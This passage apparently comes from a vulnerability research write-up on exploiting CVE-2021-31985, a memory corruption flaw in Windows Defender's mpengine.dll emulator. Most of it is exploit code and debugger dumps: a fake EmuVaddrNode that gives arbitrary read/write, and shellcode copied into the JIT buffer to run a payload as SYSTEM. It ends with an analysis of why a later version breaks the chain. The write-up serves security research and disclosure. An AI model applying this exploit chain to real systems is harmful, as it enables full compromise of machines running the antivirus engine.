// 00000247`1aa546b6  00a1 00a3 00a4 0001 0001 0001 0001 0001
// [+] PEVAMap::Reserve(lpAddr ffd00000, lpEnd ffd10000, flProt 4)
buf_ptr = pfVirtualAlloc(0xFFD00000, 0x10000, 0x3000, PAGE_READWRITE);
// OP1.2 COMMIT 0xFFD00: merge [0xa2,0xa3) with [0xa3, 0xa4):
// 1: kd> dw 000002471aa41180+13536-10 l10
// 00000247`1aa546a6  0001 0001 0001 0001 0001 0001 0091 00a0
// 00000247`1aa546b6  00a1 00a2 00a4 0001 0001 0001 0001 0001
// 1: kd> dc 00000247`1a9f61f0+18*a2 l6
// 00000247`1a9f7120  1aab1180 00000247 000ffd00 0000003f
// 00000247`1a9f7130  02ff0000 0000ffff

buf_ptr = get_pivot(0x3030E, 1);            // 0x7001352E
// =============================================
// pre-OP2: craft a1, a2, c8ae at pivot[-1,0,1]; size 0x3030e
// COMMIT FB016 between A1 (FB011) and A2 (FFD00): trigger shift_pages()
// 1: kd> dw 000002471aa41180+1352e-10 l10
// 00000247`1aa5469e  0001 0001 0001 0001 0001 0001 0001 00a1
// 00000247`1aa546ae  00a2 c8ae 0001 0001 0001 0001 0001 0001

// page 0xFFD00 was at index 0xA2, vaddr = base_70000 + 70000:
// 1: kd> dc 00000247`1a9f61f0+18*a2 l6
// 00000247`1a9f7120  1aab1180 00000247 000ffd00 0000803f
// 00000247`1a9f7130  02ff801a 0000ffff

// Version offset to leak an EmuVaddrNode idx 0x32A6:
// The base_7000 (+0x1000) is 0x4af90 (+0x1000) from EmuVaddrNode_list
// Hence we can leak the node with controlled base
buf_ptr = pfVirtualAlloc(0xFB016000, 0x1000, 0x1000, PAGE_READWRITE);
// 1: kd> dw 000002471aa41180+1352e-10 l10
// 00000247`1aa5469e  0001 0001 0001 0001 0001 0001 0001 00a1
// 00000247`1aa546ae  00a2 00a4 00a5 32a6 32a6 c8ae 0001 0001
// 1: kd> dd 000002471a9ed4b8+4*644 l1
// 00000247`1a9eedc8  00030312

// At this point, (insert_new_page+0x4fd)=>(shift_pages+0x118):
// EmuVaddrNode for FFD00 is written OOB at base_70000 + 0x1000:
// 1: kd> dc 000002471aa41180+1000 l6
// 00000247`1aa42180  1aab1180 00000247 000ffd00 0000803f
// 00000247`1aa42190  02ff801a 0000ffff

// where Vaddr = base_70000 + 0x70000, EmuPageNum = 0xFFD00
// EmuVaddrNode idx 0x32A6, *0x18 is 0x4BF90 = 0x330000 + 0x18F90
// Now we can leak Vaddr of node 0xFFD00 (idx 0x32A6) at qw_70001000

// 0x70000 (0x70 pages) more than base Vaddr of 70000 (idx 0x32)
LODWORD(leaked_idx0_base) = *(_DWORD *)(correction_0x0000 + 0x70001000);
HIDWORD(leaked_idx0_base) = dw_0x70001004;

// base Vaddr of pages are fixed distance apart
// base_40000 (idx 0) -> base_70000 (idx 0x32) -> base_FFD00 (idx 0xA2)
leaked_idx0_base -= curr_PgIdx << 12;  // -= 0xA2000, idx 0 base, 0x40000

After steps OP3 to OP5 (analysis omitted), a fakeEmuVaddrNode object for page 0x3FE83 is constructed in the work buffer. Since the Vaddr value can be freely set inside the work buffer, arbitrary R/W can therefore be achieved:


// =============================================
// fakeEmuVaddrNode: constructed in work_buf 0x70000000
// idxOffset: pageNum relative to 0x32 (work_buf 0x70000)
// pageOffset: address difference within page
// =============================================
idx_fakeEmuVaddrNode = (0x18 * (leaked_idx0_base & 0xFFF) - c_0x18F90 + 0x60000) >> 12;
pageOffset_Node = (0x18 * (leaked_idx0_base & 0xFFF) - c_0x18F90) & 0xFFF;// -0xB90
// equiv. idx 0x49, (0x49 - 0x32 + 0x70000) << 12 - 0xB90 = 0x70016470
fakeEmuVaddrNode = ((idx_fakeEmuVaddrNode - 0x32) << 12) + pageOffset_Node + 0x70000000;
// fakeEmuVaddrNode.EmuPageNum = 0x3FE83
fakeEmuVaddrNode[2] = 0x400FF - ((unsigned int)(c_0x73E0 - c_0x69F0) >> 2);
fakeEmuVaddrNode[3] = 0x803F;               // EmuProtect
*(QWORD*)fakeEmuVaddrNode = leaked_idx0_base - 0x687B8;
JIT_pageNum_LW = *(_DWORD *)0x3FE83000;		// read the LOWORD
// adjust Vaddr to JIT_buf + 0x18
// 0: kd> dq 000002471aa0f180 - 687B8
// 00000247`1a9a69c8  00000247`1ab10bd5 00000247`1ab10cb8
// 00000247`1a9a69d8  00000247`1ab10d60 00000247`12ca5705
// Extract the variable part: 0x1ab10000, add 0x18, write back to Vaddr
*fakeEmuVaddrNode = (JIT_pageNum_LW & 0xFFFFF000) + 0x18;

Now fakeEmuVaddrNode.Vaddr is adjusted to point to the returning code path in the JIT buffer, and this can be used to copy shellcode into JIT and achieve code execution.

8. Popping a SYSTEM Shell

With the fakeEmuVaddrNode pointing to JIT_buf + 0x18, shellcode can now be copied to JIT by emulated execution:


// R2: copy shellcode to Vaddr = qwo(idx0_base - 0x687B8) & ~0xFFFi64 + 0x18)
qmemcpy((void *)0x3FE83000, &shellcode_B100C000, 0x294u);
// 0: kd> u 247`1ab10000 l20
// 00000247`1ab10000 56              push    rsi
// 00000247`1ab10001 57              push    rdi
// 00000247`1ab10002 53              push    rbx
// 00000247`1ab10003 55              push    rbp
// 00000247`1ab10004 4154            push    r12
// 00000247`1ab10006 4155            push    r13
// 00000247`1ab10008 4883ec28        sub     rsp,28h
// 00000247`1ab1000c 488be9          mov     rbp,rcx
// 00000247`1ab1000f 488db188380000  lea     rsi,[rcx+3888h]
// 00000247`1ab10016 ffe2            jmp     rdx
// 00000247`1ab10018 4883c428        add     rsp,28h
// 00000247`1ab1001c 415d            pop     r13
// 00000247`1ab1001e 415c            pop     r12
// 00000247`1ab10020 5d              pop     rbp
// 00000247`1ab10021 5b              pop     rbx
// 00000247`1ab10022 5f              pop     rdi
// 00000247`1ab10023 5e              pop     rsi
// 00000247`1ab10024 c3              ret

In the preparation section, we have noted that a custom built stage2.exe of size less than 0x10000 bytes can be directly replaced in dump.exe, and gets executed as NT AUTHORITY\SYSTEM.

cve-2021-31985-demo



Parting Remark

While we developed CVE-2021-31985 exploit based on mpengine.dll 1.1.16400.2, we also tested it on an later vulnerable mpengine.dll 1.1.18100.6 version, expecting to fine-tune the constants and offsets values at worst. Unfortunately this is not the case.

cve-2021-31985-1

In the image above, the top illustration of the EmuNodeIndex_list[] array for mpengine.dll 1.1.16400, the principal mechanism of OOBW3 relies on corrupting the length of the index_list to gain additional capabilities:

  1. Crafting malformed indices in the work buffer 0x70000000 (ie: base_70000).

  2. Using the crafted indices to create a fake EmuVaddrNode object for page 0xFFD00 at an out-of-bound node index of 0x32A6.

  3. Thereafter leaks the base Vaddr of the node at 0x70001000.

Subsequent steps OP3 to OP5 also depend on this setup.

However, in the bottom illustration mpengine.dll 1.1.18100, it is observed that the entire layout of the emulator memory mappings from base_40000 onwards, is repositioned to the front of EmuVaddrNode_list[] and EmuNodeIndex_list[] arrays. In addition, the relative positions of these two lists are also swapped. In this new layout, corrupting the length field of index_list will not yield any capability to manipulate the Emulator memory ranges and the node_list. This mitigated the OOBW3 and therefore, breaks the exploitation chain in mpengine.dll 1.1.18100 even though OOBW1 and OOBW2 still works.



References

  1. Tavis Ormandy (@taviso), Issue 2189: mpengine: asprotect embedded runtime dll memory corruption

  2. Alexei Bulazel (@0xAlexei), Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator

  3. Tavis Ormandy (@taviso), Porting Windows Dynamic Link Libraries to Linux

  4. Windows Defender CVE-2021-1647 ITW Sample, Windows Defender CVE-2021-1647 ITW Sample

  5. ThreatBook (anquanke), Analysis of CVE-2021-1647 Vulnerability Exploitation Techniques

  6. Maddie Stone (@maddiestone), CVE-2021-1647: Windows Defender mpengine remote code execution

  7. Windows Defender CVE-2021-1647 Public Sample, Windows Defender CVE-2021-1647 Public Sample